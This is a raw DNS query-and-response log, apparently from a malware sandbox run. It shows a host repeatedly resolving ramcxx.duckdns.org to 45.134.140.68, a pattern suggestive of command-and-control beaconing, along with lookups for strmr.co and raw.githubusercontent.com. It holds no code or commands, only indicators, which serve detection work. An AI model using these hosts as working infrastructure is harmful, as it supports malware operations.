                                                                                                      Sep 27, 2024 12:54:25.348685980 CEST192.168.2.228.8.8.80xf731Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.394542933 CEST192.168.2.228.8.8.80xf731Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.422580004 CEST192.168.2.228.8.8.80xf731Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:25.460236073 CEST192.168.2.228.8.8.80xf731Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:26.702043056 CEST192.168.2.228.8.8.80x8401Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:27.732548952 CEST192.168.2.228.8.8.80x8401Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:28.737181902 CEST192.168.2.228.8.8.80x8401Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:28.892606020 CEST192.168.2.228.8.8.80x8401Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:28.940253019 CEST192.168.2.228.8.8.80x8401Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.052012920 CEST192.168.2.228.8.8.80xa311Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.062529087 CEST192.168.2.228.8.8.80xa311Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.070456982 CEST192.168.2.228.8.8.80xa311Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.078438997 CEST192.168.2.228.8.8.80xa311Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:30.086441994 CEST192.168.2.228.8.8.80xa311Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:31.113188028 CEST192.168.2.228.8.8.80xa76bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:31.122487068 CEST192.168.2.228.8.8.80xa76bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:31.130450964 CEST192.168.2.228.8.8.80xa76bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:33.136409044 CEST192.168.2.228.8.8.80xa76bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:33.143716097 CEST192.168.2.228.8.8.80xa76bStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:37.150149107 CEST192.168.2.228.8.8.80x4909Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:38.159568071 CEST192.168.2.228.8.8.80x4909Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:39.173758984 CEST192.168.2.228.8.8.80x4909Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:41.186692953 CEST192.168.2.228.8.8.80x4909Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:45.195664883 CEST192.168.2.228.8.8.80x4909Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:50.229626894 CEST192.168.2.228.8.8.80x9480Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:51.232441902 CEST192.168.2.228.8.8.80x9480Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:52.246438026 CEST192.168.2.228.8.8.80x9480Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:54.258888960 CEST192.168.2.228.8.8.80x9480Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:54:58.268059015 CEST192.168.2.228.8.8.80x9480Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:03.301217079 CEST192.168.2.228.8.8.80xb0b2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:04.305310965 CEST192.168.2.228.8.8.80xb0b2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:04.344793081 CEST192.168.2.228.8.8.80xb0b2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:06.350426912 CEST192.168.2.228.8.8.80xb0b2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:10.362447977 CEST192.168.2.228.8.8.80xb0b2Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:15.390448093 CEST192.168.2.228.8.8.80x52bbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:16.395597935 CEST192.168.2.228.8.8.80x52bbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:17.409342051 CEST192.168.2.228.8.8.80x52bbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:19.421729088 CEST192.168.2.228.8.8.80x52bbStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:23.579483986 CEST192.168.2.228.8.8.80xe5ddStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:24.585375071 CEST192.168.2.228.8.8.80xe5ddStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:25.599361897 CEST192.168.2.228.8.8.80xe5ddStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:27.614471912 CEST192.168.2.228.8.8.80xe5ddStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:31.628994942 CEST192.168.2.228.8.8.80xe5ddStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:36.654397011 CEST192.168.2.228.8.8.80x95b0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:37.658185005 CEST192.168.2.228.8.8.80x95b0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:38.672278881 CEST192.168.2.228.8.8.80x95b0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:40.684618950 CEST192.168.2.228.8.8.80x95b0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:44.695904016 CEST192.168.2.228.8.8.80x95b0Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:49.722269058 CEST192.168.2.228.8.8.80x6c17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:50.731075048 CEST192.168.2.228.8.8.80x6c17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:51.745053053 CEST192.168.2.228.8.8.80x6c17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:52.888044119 CEST192.168.2.228.8.8.80x6c17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:55:56.893054008 CEST192.168.2.228.8.8.80x6c17Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:02.271735907 CEST192.168.2.228.8.8.80x2237Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:03.273533106 CEST192.168.2.228.8.8.80x2237Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:04.287553072 CEST192.168.2.228.8.8.80x2237Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:06.320796967 CEST192.168.2.228.8.8.80x2237Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:10.324693918 CEST192.168.2.228.8.8.80x2237Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:15.357745886 CEST192.168.2.228.8.8.80x7709Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:16.362016916 CEST192.168.2.228.8.8.80x7709Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:17.376002073 CEST192.168.2.228.8.8.80x7709Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:19.388431072 CEST192.168.2.228.8.8.80x7709Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:56:23.397835016 CEST192.168.2.228.8.8.80x7709Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Sep 27, 2024 12:51:31.117337942 CEST8.8.8.8192.168.2.220x2e9dNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:31.117337942 CEST8.8.8.8192.168.2.220x2e9dNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:33.772002935 CEST8.8.8.8192.168.2.220xe9ddNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:33.772002935 CEST8.8.8.8192.168.2.220xe9ddNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:35.529005051 CEST8.8.8.8192.168.2.220x1803No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:35.529005051 CEST8.8.8.8192.168.2.220x1803No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:35.538244963 CEST8.8.8.8192.168.2.220x9f72No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:35.538244963 CEST8.8.8.8192.168.2.220x9f72No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:39.595208883 CEST8.8.8.8192.168.2.220xc083No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:39.595208883 CEST8.8.8.8192.168.2.220xc083No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:39.608285904 CEST8.8.8.8192.168.2.220x1100No error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:39.608285904 CEST8.8.8.8192.168.2.220x1100No error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:40.933341980 CEST8.8.8.8192.168.2.220xb6ecNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:40.933341980 CEST8.8.8.8192.168.2.220xb6ecNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:40.942069054 CEST8.8.8.8192.168.2.220xd97eNo error (0)strmr.co172.67.179.215A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:40.942069054 CEST8.8.8.8192.168.2.220xd97eNo error (0)strmr.co104.21.64.88A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:50.211376905 CEST8.8.8.8192.168.2.220xbf08No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:50.211376905 CEST8.8.8.8192.168.2.220xbf08No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:50.211376905 CEST8.8.8.8192.168.2.220xbf08No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:51:50.211376905 CEST8.8.8.8192.168.2.220xbf08No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:01.689421892 CEST8.8.8.8192.168.2.220x52fServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:02.688401937 CEST8.8.8.8192.168.2.220x52fServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:03.702383995 CEST8.8.8.8192.168.2.220x52fServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:03.817558050 CEST8.8.8.8192.168.2.220x52fNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:07.701378107 CEST8.8.8.8192.168.2.220x4a17Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:08.709635973 CEST8.8.8.8192.168.2.220x4a17Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:09.107887983 CEST8.8.8.8192.168.2.220x63c2No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:09.724097967 CEST8.8.8.8192.168.2.220x4a17Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:11.762531996 CEST8.8.8.8192.168.2.220x4a17Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:36.728404045 CEST8.8.8.8192.168.2.220x1d64Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:36.826630116 CEST8.8.8.8192.168.2.220x1d64No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:37.752424955 CEST8.8.8.8192.168.2.220xbd0cNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:38.740008116 CEST8.8.8.8192.168.2.220x1d64Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:52:40.752069950 CEST8.8.8.8192.168.2.220x1d64Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:00.368447065 CEST8.8.8.8192.168.2.220xf858No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:05.380186081 CEST8.8.8.8192.168.2.220xf858Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:06.385660887 CEST8.8.8.8192.168.2.220xf858Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:08.419262886 CEST8.8.8.8192.168.2.220xe15cNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:08.426491976 CEST8.8.8.8192.168.2.220xe15cNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:08.632849932 CEST8.8.8.8192.168.2.220xf858Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:10.386605978 CEST8.8.8.8192.168.2.220xf858Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:12.427447081 CEST8.8.8.8192.168.2.220xe15cServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:13.434952974 CEST8.8.8.8192.168.2.220xe15cServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:13.615089893 CEST8.8.8.8192.168.2.220xc5d3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:16.779191971 CEST8.8.8.8192.168.2.220xc5d3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:16.793035030 CEST8.8.8.8192.168.2.220xc5d3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.430013895 CEST8.8.8.8192.168.2.220xe15cServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.793962955 CEST8.8.8.8192.168.2.220xc5d3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.880947113 CEST8.8.8.8192.168.2.220x3de4No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.963257074 CEST8.8.8.8192.168.2.220x3de4No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.984709024 CEST8.8.8.8192.168.2.220x3de4No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.991823912 CEST8.8.8.8192.168.2.220x3de4No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:17.999262094 CEST8.8.8.8192.168.2.220x3de4No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:18.689536095 CEST8.8.8.8192.168.2.220xc5d3Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.089066982 CEST8.8.8.8192.168.2.220xb50eNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.099067926 CEST8.8.8.8192.168.2.220xb50eNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.106091022 CEST8.8.8.8192.168.2.220xb50eNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.119169950 CEST8.8.8.8192.168.2.220xb50eNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:19.131695986 CEST8.8.8.8192.168.2.220xb50eNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:21.254677057 CEST8.8.8.8192.168.2.220x7cdcNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:21.262382984 CEST8.8.8.8192.168.2.220x7cdcNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:26.034904003 CEST8.8.8.8192.168.2.220x7cdcServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:26.313342094 CEST8.8.8.8192.168.2.220x7cdcServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.099343061 CEST8.8.8.8192.168.2.220x7cdcNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.105560064 CEST8.8.8.8192.168.2.220xe5b3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.121918917 CEST8.8.8.8192.168.2.220xe5b3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.130748987 CEST8.8.8.8192.168.2.220xe5b3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.138137102 CEST8.8.8.8192.168.2.220xe5b3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:27.145992994 CEST8.8.8.8192.168.2.220xe5b3No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.576081991 CEST8.8.8.8192.168.2.220xe41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.583595991 CEST8.8.8.8192.168.2.220xe41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.618961096 CEST8.8.8.8192.168.2.220xe41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.627381086 CEST8.8.8.8192.168.2.220xe41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:28.635029078 CEST8.8.8.8192.168.2.220xe41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:30.702874899 CEST8.8.8.8192.168.2.220xc01dNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:32.711815119 CEST8.8.8.8192.168.2.220xc01dNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:34.769220114 CEST8.8.8.8192.168.2.220xc01dServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:35.713361979 CEST8.8.8.8192.168.2.220xc01dServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:36.854726076 CEST8.8.8.8192.168.2.220xfd5aNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:37.734555006 CEST8.8.8.8192.168.2.220xc01dServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:38.870749950 CEST8.8.8.8192.168.2.220xfd5aNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:38.877532005 CEST8.8.8.8192.168.2.220xfd5aNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.890532970 CEST8.8.8.8192.168.2.220xd3ccNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.898092985 CEST8.8.8.8192.168.2.220xd3ccNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.905225039 CEST8.8.8.8192.168.2.220xd3ccNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.913239956 CEST8.8.8.8192.168.2.220xd3ccNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:39.923724890 CEST8.8.8.8192.168.2.220xd3ccNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:40.829200983 CEST8.8.8.8192.168.2.220xfd5aServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:41.861426115 CEST8.8.8.8192.168.2.220xfd5aServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:46.200342894 CEST8.8.8.8192.168.2.220xe95bServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:47.003608942 CEST8.8.8.8192.168.2.220xe95bServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:47.304478884 CEST8.8.8.8192.168.2.220xe95bNo error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:48.033371925 CEST8.8.8.8192.168.2.220xe95bServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:49.425704956 CEST8.8.8.8192.168.2.220x1d05No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:49.432674885 CEST8.8.8.8192.168.2.220x1d05No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:50.034231901 CEST8.8.8.8192.168.2.220xe95bServer failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:52.537024975 CEST8.8.8.8192.168.2.220x1d05No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:52.544259071 CEST8.8.8.8192.168.2.220x1d05No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:53.939667940 CEST8.8.8.8192.168.2.220x1d05Server failure (2)ramcxx.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.031927109 CEST8.8.8.8192.168.2.220xf155No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.039519072 CEST8.8.8.8192.168.2.220xf155No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.048127890 CEST8.8.8.8192.168.2.220xf155No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.055480003 CEST8.8.8.8192.168.2.220xf155No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:54.062772989 CEST8.8.8.8192.168.2.220xf155No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.264687061 CEST8.8.8.8192.168.2.220xd268No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.271814108 CEST8.8.8.8192.168.2.220xd268No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.278295040 CEST8.8.8.8192.168.2.220xd268No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.285697937 CEST8.8.8.8192.168.2.220xd268No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:56.351878881 CEST8.8.8.8192.168.2.220xd268No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.300039053 CEST8.8.8.8192.168.2.220xbd41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
                                                                                                      Sep 27, 2024 12:53:57.310620070 CEST8.8.8.8192.168.2.220xbd41No error (0)ramcxx.duckdns.org45.134.140.68A (IP address)IN (0x0001)false
